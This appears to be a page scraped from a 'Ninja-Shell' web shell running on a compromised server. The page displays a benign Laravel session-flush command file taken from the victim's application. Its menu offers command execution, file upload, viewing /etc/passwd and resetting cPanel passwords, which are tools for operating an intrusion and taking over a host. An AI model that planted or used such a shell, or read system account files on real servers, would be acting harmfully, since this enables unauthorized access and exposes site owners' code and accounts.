{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//arsu/app/Console/Commands//SessionFlush.php
<?php namespace App\Console\Commands; use Illuminate\Console\Command; use Illuminate\Support\Facades\Artisan; use Illuminate\Support\Facades\Session; class SessionFlush extends Command { /** * The name and signature of the console command. * * @var string */ protected $signature = 'session:flush'; /** * The console command description. * * @var string */ protected $description = 'Command description'; /** * Create a new command instance. * * @return void */ public function __construct() { parent::__construct(); } /** * Execute the console command. * * @return int */ public function handle() { Session::getHandler()->gc(0); Artisan::call('cache:clear'); Artisan::call('debugbar:clear'); //DB::table('sessions')->truncate(); } }
./Ninja\.